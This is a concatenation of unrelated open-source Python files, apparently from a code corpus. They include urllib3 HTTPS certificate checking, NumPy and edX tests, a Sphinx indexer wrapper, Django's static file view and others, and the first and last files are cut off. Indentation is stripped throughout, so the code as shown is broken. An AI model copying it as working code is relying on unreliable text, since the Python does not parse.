This method should only be called once, before the connection is used.
"""
# If cert_reqs is not provided, we can try to guess. If the user gave
# us a cert database, we assume they want to use it: otherwise, if
# they gave us an SSL Context object we should use whatever is set for
# it.
if cert_reqs is None:
if ca_certs or ca_cert_dir:
cert_reqs = 'CERT_REQUIRED'
elif self.ssl_context is not None:
cert_reqs = self.ssl_context.verify_mode
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
self.ca_certs = ca_certs and os.path.expanduser(ca_certs)
self.ca_cert_dir = ca_cert_dir and os.path.expanduser(ca_cert_dir)
def connect(self):
# Add certificate verification
conn = self._new_conn()
hostname = self.host
if getattr(self, '_tunnel_host', None):
# _tunnel_host was added in Python 2.6.3
# (See: http://hg.python.org/cpython/rev/0f57b30a152f)
self.sock = conn
# Calls self._set_hostport(), so self.host is
# self._tunnel_host below.
self._tunnel()
# Mark this connection as not reusable
self.auto_open = 0
# Override the host with the one we're requesting data from.
hostname = self._tunnel_host
is_time_off = datetime.date.today() < RECENT_DATE
if is_time_off:
warnings.warn((
'System time is way off (before {0}). This will probably '
'lead to SSL verification errors').format(RECENT_DATE),
SystemTimeWarning
)
# Wrap socket using verification with the root certs in
# trusted_root_certs
if self.ssl_context is None:
self.ssl_context = create_urllib3_context(
ssl_version=resolve_ssl_version(self.ssl_version),
cert_reqs=resolve_cert_reqs(self.cert_reqs),
)
context = self.ssl_context
context.verify_mode = resolve_cert_reqs(self.cert_reqs)
self.sock = ssl_wrap_socket(
sock=conn,
keyfile=self.key_file,
certfile=self.cert_file,
ca_certs=self.ca_certs,
ca_cert_dir=self.ca_cert_dir,
server_hostname=hostname,
ssl_context=context)
if self.assert_fingerprint:
assert_fingerprint(self.sock.getpeercert(binary_form=True),
self.assert_fingerprint)
elif context.verify_mode != ssl.CERT_NONE \
and self.assert_hostname is not False:
cert = self.sock.getpeercert()
if not cert.get('subjectAltName', ()):
warnings.warn((
'Certificate for {0} has no `subjectAltName`, falling back to check for a '
'`commonName` for now. This feature is being removed by major browsers and '
'deprecated by RFC 2818. (See https://github.com/shazow/urllib3/issues/497 '
'for details.)'.format(hostname)),
SubjectAltNameWarning
)
_match_hostname(cert, self.assert_hostname or hostname)
self.is_verified = (
context.verify_mode == ssl.CERT_REQUIRED or
self.assert_fingerprint is not None
)
def _match_hostname(cert, asserted_hostname):
try:
match_hostname(cert, asserted_hostname)
except CertificateError as e:
log.error(
'Certificate did not match expected hostname: %s. '
'Certificate: %s', asserted_hostname, cert
)
# Add cert to exception and reraise so client code can inspect
# the cert when catching the exception, if they want to
e._peer_cert = cert
raise
if ssl:
# Make a copy for testing.
UnverifiedHTTPSConnection = HTTPSConnection
HTTPSConnection = VerifiedHTTPSConnection
else:
HTTPSConnection = DummyConnection
|
liuqr/edx-xiaodun
|
refs/heads/master
|
i18n/tests/test_compiled_messages.py
|
22
|
"""
Test that the compiled .mo files match the translations in the
uncompiled .po files.
This is required because we are checking in the .mo files into
the repo, but compiling them is a manual process. We want to make
sure that we find out if someone forgets the compilation step.
"""
import ddt
import polib
from unittest import TestCase
from i18n.config import CONFIGURATION, LOCALE_DIR
@ddt.ddt
class TestCompiledMessages(TestCase):
"""
Test that mo files match their source po files
"""
PO_FILES = ['django.po', 'djangojs.po']
@ddt.data(*CONFIGURATION.translated_locales)
def test_translated_messages(self, locale):
message_dir = LOCALE_DIR / locale / 'LC_MESSAGES'
for pofile_name in self.PO_FILES:
pofile_path = message_dir / pofile_name
pofile = polib.pofile(pofile_path)
mofile = polib.mofile(pofile_path.stripext() + '.mo')
po_entries = {entry.msgid: entry for entry in pofile.translated_entries()}
mo_entries = {entry.msgid: entry for entry in mofile.translated_entries()}
# Check that there are no entries in po that aren't in mo, and vice-versa
self.assertEquals(po_entries.viewkeys(), mo_entries.viewkeys())
for entry_id, po_entry in po_entries.iteritems():
mo_entry = mo_entries[entry_id]
for attr in ('msgstr', 'msgid_plural', 'msgstr_plural', 'msgctxt', 'obsolete', 'encoding'):
po_attr = getattr(po_entry, attr)
mo_attr = getattr(mo_entry, attr)
# The msgstr_plural in the mo_file is keyed on ints, but in the po_file it's
# keyed on strings. This normalizes them.
if attr == 'msgstr_plural':
po_attr = {int(key): val for (key, val) in po_attr.items()}
self.assertEquals(
po_attr,
mo_attr,
"When comparing {} for entry {!r}, {!r} from the .po file doesn't match {!r} from the .mo file".format(
attr,
entry_id,
po_attr,
mo_attr,
)
)
|
TomT0m/cmds
|
refs/heads/master
|
command/cmds.py
|
1
|
#! /usr/bin/python3
#encoding: utf-8
"""
#Description : a script listing & showing description of other scripts
scripts listed must follow the following convention : a line beginning with # and matching 'Description( )?:(.*)'
Other meta information includes :
"Group" if command is a meta command, used as a simily path
"""
import os, sys
import os.path as path
import glob
from optparse import OptionParser
def matches_spec(scriptname):
""" Returns wether or not @scriptname
matches our scripts managemement conventions
"""
try:
with open(scriptname) as f:
for line in f:
if '#Description' in line:
return True
# if '#Group' in line:
# return True
except Exception:
return False
import re
def extract_pair(line):
res = re.search('^#(\w+) *:(.*)$', line)
if res:
return [(res.group(1).strip(), res.group(2))]
return []
def read_datas(scriptname):
datas = {}
with open(scriptname) as f:
datas = {key: val for line in f
for (key, val) in
extract_pair(line) }
return datas
DIRECTORY = path.expanduser("~/bin")
class Script(object):
""" Storing infos about a script"""
def __init__(self, script, infos):
self.infos = infos
self.script = script
@property
def path(self):
return path.dirname(self.script)
@property
def name(self):
return path.basename(self.script)
@property
def description(self):
return self.infos["Description"]
@property
def is_meta(self):
return "Meta" in self.infos
def analyse_directory(bin_path):
os.chdir(bin_path)
script_names = [path for path in glob.glob(path.join(bin_path, "*"))
if matches_spec(path) ]
scripts = []
for script in script_names:
script = Script(script, read_datas(script))
scripts.append(script)
return scripts
def create_cl_parser():
parser = OptionParser()
parser.add_option("-c", "--complete", action = "store_true", default=False,
help = "to be used by bash autocomplete", dest = "complete")
parser.add_option("-m", "--list-meta", action = "store_true", default=False,
help = "list meta commands", dest = "complete_meta")
parser.add_option("-t", "--test", action = "store_true", default=False,
help = "Launches unit tests", dest = "tests")
parser.add_option("-f", "--forward", metavar="DIR", default=False,
help = "to set command directory to an arbitrary directory", dest = "forward")
return parser
import argparse
def create_argument_parser(description = None):
""" New version with argparse """
parser = argparse.ArgumentParser(description = description)
parser.add_argument("-c", "--complete", action = "store_true", default=False,
help = "to be used by bash autocomplete", dest = "complete")
parser.add_argument("-t", "--test", action = "store_true", default=False,
help = "Launches unit tests", dest = "tests")
return parser
import subprocess
def try_exec(directory, script_name, args):
command = [os.path.join(directory, script_name)]
command.extend(args)
cmd = subprocess.Popen(command, shell = False)
cmd.wait()
def command_in(command_str, command_list):
return command_str in [ command.name for command in command_list]
def main():
scripts = None
directory = DIRECTORY
scripts = analyse_directory(directory)
# do we get a real command ?
if len(sys.argv) >= 4 and command_in(sys.argv[3], analyse_directory(sys.argv[2])):
try_exec(sys.argv[2], sys.argv[3], sys.argv[4:])
exit(0)
parser = create_cl_parser()
(options, args) = parser.parse_args()
if options.forward :
directory = options.forward
scripts = analyse_directory(directory)
if options.complete :
print(" ".join( [script.name for script in scripts] ))
elif options.complete_meta:
print(" ".join( [script.name for script in scripts
if script.is_meta]))
elif len(scripts) > 0:
taille = max ( [len(script.name) for script in scripts])
for script in scripts:
print(" {}: {} ".format(script.name.ljust(taille), script.description))
|
GalaxyTab4/android_kernel_samsung_s3ve3g
|
refs/heads/cm-13.0
|
tools/perf/util/setup.py
|
4998
|
#!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
|
isu-enterprise/icc.cellula
|
refs/heads/master
|
src/icc/cellula/indexer/components.py
|
3
|
from icc.cellula.indexer.interfaces import IIndexer
from zope.interface import implementer, Interface
from zope.component import getUtility
import subprocess as sp
from icc.contentstorage import intdigest, hexdigest
import os.path, os, signal
from icc.cellula.indexer.sphinxapi import *
from pkg_resources import resource_filename
import os
import os.path
import logging
logger=logging.getLogger('icc.cellula')
HOST='127.0.0.1'
PORT=9312
INDEX_NAME='annotations'
INDEX_TEMPLATE="""
source %(index_name)s_source
{
type = tsvpipe
tsvpipe_command = %(pipe_prog)s
tsvpipe_attr_string = hid
tsvpipe_field = body
%(indexer_fields)s
}
index %(index_name)s
{
source = %(index_name)s_source
path=%(dir)s/%(index_name)s
morphology=stem_enru
min_word_len = 3
}
indexer
{
# Максимальный лимит используемой памяти RAM
mem_limit = 32M
}
searchd
{
listen = %(host)s:%(port)s
#listen = %(dir)s/searchd.sock
#listen = 9312
#listen = 127.0.0.1:9386:mysql41
# log file, searchd run info is logged here
# optional, default is 'searchd.log'
log = %(dir)s/searchd.log
# query log file, all search queries are logged here
# optional, default is empty (do not log queries)
query_log = %(dir)s/query.log
# client read timeout, seconds
# optional, default is 5
read_timeout = 5
# request timeout, seconds
# optional, default is 5 minutes
client_timeout = 300
# maximum amount of children to fork (concurrent searches to run)
# optional, default is 0 (unlimited)
max_children = 30
# maximum amount of persistent connections from this master to each agent host
# optional, but necessary if you use agent_persistent. It is reasonable to set the value
# as max_children, or less on the agent's hosts.
persistent_connections_limit = 30
# PID file, searchd process ID file name
# mandatory
pid_file = %(dir)s/searchd.pid
# seamless rotate, prevents rotate stalls if precaching huge datasets
# optional, default is 1
seamless_rotate = 1
# whether to forcibly preopen all indexes on startup
# optional, default is 1 (preopen everything)
preopen_indexes = 1
# whether to unlink .old index copies on succesful rotation.
# optional, default is 1 (do unlink)
unlink_old = 1
# attribute updates periodic flush timeout, seconds
# updates will be automatically dumped to disk this frequently
# optional, default is 0 (disable periodic flush)
#
# attr_flush_period = 900
# MVA updates pool size
# shared between all instances of searchd, disables attr flushes!
# optional, default size is 1M
mva_updates_pool = 1M
# max allowed network packet size
# limits both query packets from clients, and responses from agents
# optional, default size is 8M
max_packet_size = 8M
# max allowed per-query filter count
# optional, default is 256
max_filters = 256
# max allowed per-filter values count
# optional, default is 4096
max_filter_values = 4096
# socket listen queue length
# optional, default is 5
#
# listen_backlog = 5
# per-keyword read buffer size
# optional, default is 256K
#
# read_buffer = 256K
# unhinted read size (currently used when reading hits)
# optional, default is 32K
#
# read_unhinted = 32K
# max allowed per-batch query count (aka multi-query count)
# optional, default is 32
max_batch_queries = 32
# max common subtree document cache size, per-query
# optional, default is 0 (disable subtree optimization)
#
# subtree_docs_cache = 4M
# max common subtree hit cache size, per-query
# optional, default is 0 (disable subtree optimization)
#
# subtree_hits_cache = 8M
# multi-processing mode (MPM)
# known values are none, fork, prefork, and threads
# threads is required for RT backend to work
# optional, default is threads
workers = threads # for RT to work
# max threads to create for searching local parts of a distributed index
# optional, default is 0, which means disable multi-threaded searching
# should work with all MPMs (ie. does NOT require workers=threads)
#
# dist_threads = 4
# binlog files path; use empty string to disable binlog
# optional, default is build-time configured data directory
#
# binlog_path = # disable logging
binlog_path = %(dir)s # binlog.001 etc will be created there
# binlog flush/sync mode
# 0 means flush and sync every second
# 1 means flush and sync every transaction
# 2 means flush every transaction, sync every second
# optional, default is 2
#
# binlog_flush = 2
# binlog per-file size limit
# optional, default is 128M, 0 means no limit
#
# binlog_max_log_size = 256M
# per-thread stack size, only affects workers=threads mode
# optional, default is 64K
#
# thread_stack = 128K
# per-keyword expansion limit (for dict=keywords prefix searches)
# optional, default is 0 (no limit)
#
# expansion_limit = 1000
# RT RAM chunks flush period
# optional, default is 0 (no periodic flush)
#
# rt_flush_period = 900
# query log file format
# optional, known values are plain and sphinxql, default is plain
#
# query_log_format = sphinxql
# version string returned to MySQL network protocol clients
# optional, default is empty (use Sphinx version)
#
# mysql_version_string = 5.0.37
# default server-wide collation
# optional, default is libc_ci
#
# collation_server = utf8_general_ci
# server-wide locale for libc based collations
# optional, default is C
#
# collation_libc_locale = ru_RU.UTF-8
# threaded server watchdog (only used in workers=threads mode)
# optional, values are 0 and 1, default is 1 (watchdog on)
#
# watchdog = 1
# costs for max_predicted_time model, in (imaginary) nanoseconds
# optional, default is "doc=64, hit=48, skip=2048, match=64"
#
# predicted_time_costs = doc=64, hit=48, skip=2048, match=64
# current SphinxQL state (uservars etc) serialization path
# optional, default is none (do not serialize SphinxQL state)
#
# sphinxql_state = sphinxvars.sql
# maximum RT merge thread IO calls per second, and per-call IO size
# useful for throttling (the background) OPTIMIZE INDEX impact
# optional, default is 0 (unlimited)
#
# rt_merge_iops = 40
# rt_merge_maxiosize = 1M
# interval between agent mirror pings, in milliseconds
# 0 means disable pings
# optional, default is 1000
#
# ha_ping_interval = 0
# agent mirror statistics window size, in seconds
# stats older than the window size (karma) are retired
# that is, they will not affect master choice of agents in any way
# optional, default is 60 seconds
#
# ha_period_karma = 60
# delay between preforked children restarts on rotation, in milliseconds
# optional, default is 0 (no delay)
#
# prefork_rotation_throttle = 100
# a prefix to prepend to the local file names when creating snippets
# with load_files and/or load_files_scatter options
# optional, default is empty
#
# snippets_file_prefix = /mnt/common/server1/
}
#############################################################################
## common settings
#############################################################################
common
{
# lemmatizer dictionaries base path
# optional, defaut is /usr/local/share (see ./configure --datadir)
#
# lemmatizer_base = /usr/local/share/sphinx/dicts
# how to handle syntax errors in JSON attributes
# known values are 'ignore_attr' and 'fail_index'
# optional, default is 'ignore_attr'
#
# on_json_attr_error = fail_index
# whether to auto-convert numeric values from strings in JSON attributes
# with auto-conversion, string value with actually numeric data
# (as in {"key":"12345"}) gets stored as a number, rather than string
# optional, allowed values are 0 and 1, default is 0 (do not convert)
#
# json_autoconv_numbers = 1
# whether and how to auto-convert key names in JSON attributes
# known value is 'lowercase'
# optional, default is unspecified (do nothing)
#
# json_autoconv_keynames = lowercase
# path to RLP root directory
# optional, defaut is /usr/local/share (see ./configure --datadir)
#
# rlp_root = /usr/local/share/sphinx/rlp
# path to RLP environment file
# optional, defaut is /usr/local/share/rlp-environment.xml (see ./configure --datadir)
#
# rlp_environment = /usr/local/share/sphinx/rlp/rlp/etc/rlp-environment.xml
# maximum total size of documents batched before processing them by the RLP
# optional, default is 51200
#
# rlp_max_batch_size = 100k
# maximum number of documents batched before processing them by the RLP
# optional, default is 50
#
# rlp_max_batch_docs = 100
# trusted plugin directory
# optional, default is empty (disable UDFs)
#
# plugin_dir = /usr/local/sphinx/lib
}
"""
@implementer(IIndexer)
class SphinxIndexer(object):
executable="sphinx-searchd"
indexer="sphinx-indexer"
def __init__(self):
"""Creates index service.
1. Generates a config in conf_dir;
2. Starts daemon tracking its pid pid_file;
3. Hopefully stops daemon on application exit.
"""
config=getUtility(Interface, "configuration")
ic=config['indexer']
data_dir = os.path.abspath(ic['data_dir'])
if not os.path.exists(data_dir):
os.makedirs(data_dir)
self.data_dir = data_dir
self.pid_file=os.path.join(self.data_dir, "searchd.pid")
self.conf_file=ic['conf_file']
self.batch_amount=int(ic.get('batch_amount', 200))
self.host=ic.get('host',HOST)
self.port=int(ic.get('port',PORT))
self.index_name=ic.get('index_name',INDEX_NAME)
self.execpathname=self.run(self.executable, executable='which').strip()
self.indexerpathname=self.run(self.indexer, executable='which').strip()
self.filepath_conf=None
self.started=False
self.index_proc=None
self.test()
self.create_config()
# self.reindex()
def test(self):
out=self.run('--help', executable=self.execpathname)
if not out.startswith("Sphinx"):
raise RuntimeError("cannot start Sphinx index server")
def run(self, *params, ignore_err=False, executable=None, par=False):
"""Run extract binary and capture its stdout.
If there is some stderr output, raise exception if
it is not igored (ignore_err).
"""
if executable == None:
executable = self.execpathname
exec_bundle=[executable]+list(params)
logger.debug("EXEC: "+" ".join(exec_bundle))
if par:
cp=sp.Popen(exec_bundle, stdout=sp.PIPE, stderr=sp.PIPE)
return cp
else:
cp=sp.run(exec_bundle, stdout=sp.PIPE, stderr=sp.PIPE)
if cp.stderr and not ignore_err:
raise RuntimeError(cp.stderr.decode('utf-8').strip())
return cp.stdout.decode('utf-8')
def create_config(self):
"""Creates config file, controlling indexer.
"""
script_name=resource_filename("icc.cellula","indexer/scripts/indexfeeder.py")
me_python = os.path.join(sys.exec_prefix,"bin","python3")
feeder=me_python+" "+script_name
config=INDEX_TEMPLATE % {
"dir":self.data_dir,
"pipe_prog":feeder,
"indexer_fields":'',
'host':self.host,
'port':self.port,
'index_name':self.index_name,
}
self.filepath_conf = os.path.join(self.data_dir, self.conf_file)
of=open(self.filepath_conf, "w")
of.write(config)
of.close()
def start_daemon(self, times=3):
self.started=False
start=False
if times<=0:
logger.error("Could not start sphinx search daemon.")
return False
try:
pid=open(self.pid_file).read()
pid=int(pid)
except IOError:
start=True
except ValueError:
start=True
if not start:
try:
rc=os.kill(pid, signal.SIGHUP)
self.started=True
self.filepath_pid=self.pid_file
return True
except ProcessLookupError:
pass
self.reindex(par=False)
out=self.run('--config', self.filepath_conf)
self.start_daemon(times-1)
def connect(self):
cl=SphinxClient()
cl.SetServer(self.host, self.port)
cl.SetLimits(0, self.batch_amount, max(self.batch_amount, 1000))
return cl
@property
def pid(self):
return int(open(self.filepath_pid).read().strip())
def __del__(self):
if self.filepath_conf != None:
os.remove(self.filepath_conf)
#pid=self.pid()
self.run('--stopwait')
#os.remove(self.filename_pid)
def reindex(self, par=True, index=None):
# remove mark
self.index_delta(par=par, index=index)
def index_delta(self, par=True, index=None):
p=self.index_proc
if p != None and par:
logger.debug("Poll:" + str(p.poll()))
if not p.poll():
return False
else:
stderr=p.stderr.read().strip()
if len(stderr)>0:
logger.error("Indexer:" + stderr)
p=self.index_proc=self.run(
"--rotate",
"--quiet",
'--config', self.filepath_conf,
self.index_name,
executable=self.indexerpathname,
par=par
)
if p.strip():
logger.error(p)
def search(self, query):
if not self.started:
self.start_daemon()
if not self.started:
raise RuntimeError("cannot start daemon")
cl=self.connect()
rc=cl.Query(query.encode('utf-8'), self.index_name)
if not rc:
raise RuntimeError('sphinx query failed:'+ cl.GetLastError())
warn=cl.GetLastWarning()
if warn:
logger.warning("Sphinx:" + warn)
return rc
|
kaiserroll14/301finalproject
|
refs/heads/master
|
main/numpy/core/tests/test_indexerrors.py
|
145
|
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import TestCase, run_module_suite, assert_raises
class TestIndexErrors(TestCase):
'''Tests to exercise indexerrors not covered by other tests.'''
def test_arraytypes_fasttake(self):
'take from a 0-length dimension'
x = np.empty((2, 3, 0, 4))
assert_raises(IndexError, x.take, [0], axis=2)
assert_raises(IndexError, x.take, [1], axis=2)
assert_raises(IndexError, x.take, [0], axis=2, mode='wrap')
assert_raises(IndexError, x.take, [0], axis=2, mode='clip')
def test_take_from_object(self):
# Check exception taking from object array
d = np.zeros(5, dtype=object)
assert_raises(IndexError, d.take, [6])
# Check exception taking from 0-d array
d = np.zeros((5, 0), dtype=object)
assert_raises(IndexError, d.take, [1], axis=1)
assert_raises(IndexError, d.take, [0], axis=1)
assert_raises(IndexError, d.take, [0])
assert_raises(IndexError, d.take, [0], mode='wrap')
assert_raises(IndexError, d.take, [0], mode='clip')
def test_multiindex_exceptions(self):
a = np.empty(5, dtype=object)
assert_raises(IndexError, a.item, 20)
a = np.empty((5, 0), dtype=object)
assert_raises(IndexError, a.item, (0, 0))
a = np.empty(5, dtype=object)
assert_raises(IndexError, a.itemset, 20, 0)
a = np.empty((5, 0), dtype=object)
assert_raises(IndexError, a.itemset, (0, 0), 0)
def test_put_exceptions(self):
a = np.zeros((5, 5))
assert_raises(IndexError, a.put, 100, 0)
a = np.zeros((5, 5), dtype=object)
assert_raises(IndexError, a.put, 100, 0)
a = np.zeros((5, 5, 0))
assert_raises(IndexError, a.put, 100, 0)
a = np.zeros((5, 5, 0), dtype=object)
assert_raises(IndexError, a.put, 100, 0)
def test_iterators_exceptions(self):
"cases in iterators.c"
def assign(obj, ind, val):
obj[ind] = val
a = np.zeros([1, 2, 3])
assert_raises(IndexError, lambda: a[0, 5, None, 2])
assert_raises(IndexError, lambda: a[0, 5, 0, 2])
assert_raises(IndexError, lambda: assign(a, (0, 5, None, 2), 1))
assert_raises(IndexError, lambda: assign(a, (0, 5, 0, 2), 1))
a = np.zeros([1, 0, 3])
assert_raises(IndexError, lambda: a[0, 0, None, 2])
assert_raises(IndexError, lambda: assign(a, (0, 0, None, 2), 1))
a = np.zeros([1, 2, 3])
assert_raises(IndexError, lambda: a.flat[10])
assert_raises(IndexError, lambda: assign(a.flat, 10, 5))
a = np.zeros([1, 0, 3])
assert_raises(IndexError, lambda: a.flat[10])
assert_raises(IndexError, lambda: assign(a.flat, 10, 5))
a = np.zeros([1, 2, 3])
assert_raises(IndexError, lambda: a.flat[np.array(10)])
assert_raises(IndexError, lambda: assign(a.flat, np.array(10), 5))
a = np.zeros([1, 0, 3])
assert_raises(IndexError, lambda: a.flat[np.array(10)])
assert_raises(IndexError, lambda: assign(a.flat, np.array(10), 5))
a = np.zeros([1, 2, 3])
assert_raises(IndexError, lambda: a.flat[np.array([10])])
assert_raises(IndexError, lambda: assign(a.flat, np.array([10]), 5))
a = np.zeros([1, 0, 3])
assert_raises(IndexError, lambda: a.flat[np.array([10])])
assert_raises(IndexError, lambda: assign(a.flat, np.array([10]), 5))
def test_mapping(self):
"cases from mapping.c"
def assign(obj, ind, val):
obj[ind] = val
a = np.zeros((0, 10))
assert_raises(IndexError, lambda: a[12])
a = np.zeros((3, 5))
assert_raises(IndexError, lambda: a[(10, 20)])
assert_raises(IndexError, lambda: assign(a, (10, 20), 1))
a = np.zeros((3, 0))
assert_raises(IndexError, lambda: a[(1, 0)])
assert_raises(IndexError, lambda: assign(a, (1, 0), 1))
a = np.zeros((10,))
assert_raises(IndexError, lambda: assign(a, 10, 1))
a = np.zeros((0,))
assert_raises(IndexError, lambda: assign(a, 10, 1))
a = np.zeros((3, 5))
assert_raises(IndexError, lambda: a[(1, [1, 20])])
assert_raises(IndexError, lambda: assign(a, (1, [1, 20]), 1))
a = np.zeros((3, 0))
assert_raises(IndexError, lambda: a[(1, [0, 1])])
assert_raises(IndexError, lambda: assign(a, (1, [0, 1]), 1))
def test_methods(self):
"cases from methods.c"
a = np.zeros((3, 3))
assert_raises(IndexError, lambda: a.item(100))
assert_raises(IndexError, lambda: a.itemset(100, 1))
a = np.zeros((0, 3))
assert_raises(IndexError, lambda: a.item(100))
assert_raises(IndexError, lambda: a.itemset(100, 1))
if __name__ == "__main__":
run_module_suite()
|
adelton/django
|
refs/heads/master
|
django/views/static.py
|
190
|
"""
Views and functions for serving static files. These are only to be used
during development, and SHOULD NOT be used in a production setting.
"""
from __future__ import unicode_literals
import mimetypes
import os
import posixpath
import re
import stat
from django.http import (
FileResponse, Http404, HttpResponse, HttpResponseNotModified,
HttpResponseRedirect,
)
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils.http import http_date, parse_http_date
from django.utils.six.moves.urllib.parse import unquote
from django.utils.translation import ugettext as _, ugettext_lazy
def serve(request, path, document_root=None, show_indexes=False):
"""
Serve static files below a given point in the directory structure.
To use, put a URL pattern such as::
from django.views.static import serve
url(r'^(?P<path>.*)$', serve, {'document_root': '/path/to/my/files/'})
in your URLconf. You must provide the ``document_root`` param. You may
also set ``show_indexes`` to ``True`` if you'd like to serve a basic index
of the directory. This index view will use the template hardcoded below,
but if you'd like to override it, you can create a template called
``static/directory_index.html``.
"""
path = posixpath.normpath(unquote(path))
path = path.lstrip('/')
newpath = ''
for part in path.split('/'):
if not part:
# Strip empty path components.
continue
drive, part = os.path.splitdrive(part)
head, part = os.path.split(part)
if part in (os.curdir, os.pardir):
# Strip '.' and '..' in path.
continue
newpath = os.path.join(newpath, part).replace('\\', '/')
if newpath and path != newpath:
return HttpResponseRedirect(newpath)
fullpath = os.path.join(document_root, newpath)
if os.path.isdir(fullpath):
if show_indexes:
return directory_index(newpath, fullpath)
raise Http404(_("Directory indexes are not allowed here."))
if not os.path.exists(fullpath):
raise Http404(_('"%(path)s" does not exist') % {'path': fullpath})
# Respect the If-Modified-Since header.
statobj = os.stat(fullpath)
if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
statobj.st_mtime, statobj.st_size):
return HttpResponseNotModified()
content_type, encoding = mimetypes.guess_type(fullpath)
content_type = content_type or 'application/octet-stream'
response = FileResponse(open(fullpath, 'rb'), content_type=content_type)
response["Last-Modified"] = http_date(statobj.st_mtime)
if stat.S_ISREG(statobj.st_mode):
response["Content-Length"] = statobj.st_size
if encoding:
response["Content-Encoding"] = encoding
return response
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
{% load i18n %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</title>
</head>
<body>
<h1>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</h1>
<ul>
{% ifnotequal directory "/" %}
<li><a href="../">../</a></li>
{% endifnotequal %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
template_translatable = ugettext_lazy("Index of %(directory)s")
def directory_index(path, fullpath):
try:
t = loader.select_template([
'static/directory_index.html',
'static/directory_index',
])
except TemplateDoesNotExist:
t = Engine().from_string(DEFAULT_DIRECTORY_INDEX_TEMPLATE)
files = []
for f in os.listdir(fullpath):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
f += '/'
files.append(f)
c = Context({
'directory': path + '/',
'file_list': files,
})
return HttpResponse(t.render(c))
def was_modified_since(header=None, mtime=0, size=0):
"""
Was something modified since the user last downloaded it?
header
This is the value of the If-Modified-Since header. If this is None,
I'll just return True.
mtime
This is the modification time of the item we're talking about.
size
This is the size of the item we're talking about.
"""
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
re.IGNORECASE)
header_mtime = parse_http_date(matches.group(1))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
if int(mtime) > header_mtime:
raise ValueError
except (AttributeError, ValueError, OverflowError):
return True
return False
|
bluedynamics/bda.bfg.app
|
refs/heads/master
|
src/bda/bfg/app/browser/authoring.py
|
1
|
from repoze.bfg.view import bfg_view
from bda.bfg.tile import (
Tile,
tile,
registerTile,
render_tile,
)
from bda.bfg.app.model import (
getNodeInfo,
Properties,
BaseNode,
AdapterNode,
)
from bda.bfg.app.browser import render_main_template
from bda.bfg.app.browser.layout import ProtectedContentTile
from bda.bfg.app.browser.utils import (
make_url,
make_query,
)
@bfg_view('add', permission='login')
def add(model, request):
return render_main_template(model, request, contenttilename='add')
@tile('add', 'templates/add.pt', permission='login', strict=False)
class AddTile(ProtectedContentTile):
@property
def addform(self):
nodeinfo = self.info
if not nodeinfo:
return u'Unknown factory'
if AdapterNode in nodeinfo.node.__bases__:
addmodel = nodeinfo.node(BaseNode(), None, None)
else:
addmodel = nodeinfo.node()
addmodel.__parent__ = self.model
return render_tile(addmodel, self.request, 'addform')
@property
def info(self):
factory = self.request.params.get('factory')
allowed = self.model.nodeinfo.addables
if not factory or not allowed or not factory in allowed:
return None
return getNodeInfo(factory)
@bfg_view('edit', permission='login')
def edit(model, request):
return render_main_template(model, request, contenttilename='edit')
registerTile('edit',
'bda.bfg.app:browser/templates/edit.pt',
class_=ProtectedContentTile,
permission='login',
strict=False)
@tile('add_dropdown', 'templates/add_dropdown.pt', strict=False)
class AddDropdown(Tile):
@property
def items(self):
ret = list()
addables = self.model.nodeinfo.addables
if not addables:
return ret
for addable in addables:
info = getNodeInfo(addable)
if not info:
continue
query = make_query(factory=addable)
url = make_url(self.request, node=self.model,
resource='add', query=query)
target = make_url(self.request, node=self.model, query=query)
props = Properties()
props.url = url
props.target = target
props.title = info.title
props.icon = info.icon
ret.append(props)
return ret
registerTile('contextmenu',
'bda.bfg.app:browser/templates/contextmenu.pt',
permission='login',
strict=True)
|
jabesq/home-assistant
|
refs/heads/dev
|
homeassistant/components/tellstick/sensor.py
|
7
|
"""Support for Tellstick sensors."""
import logging
from collections import namedtuple
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import TEMP_CELSIUS, CONF_ID, CONF_NAME
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DatatypeDescription = namedtuple('DatatypeDescription', ['name', 'unit'])
CONF_DATATYPE_MASK = 'datatype_mask'
CONF_ONLY_NAMED = 'only_named'
CONF_TEMPERATURE_SCALE = 'temperature_scale'
DEFAULT_DATATYPE_MASK = 127
DEFAULT_TEMPERATURE_SCALE = TEMP_CELSIUS
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_TEMPERATURE_SCALE, default=DEFAULT_TEMPERATURE_SCALE):
cv.string,
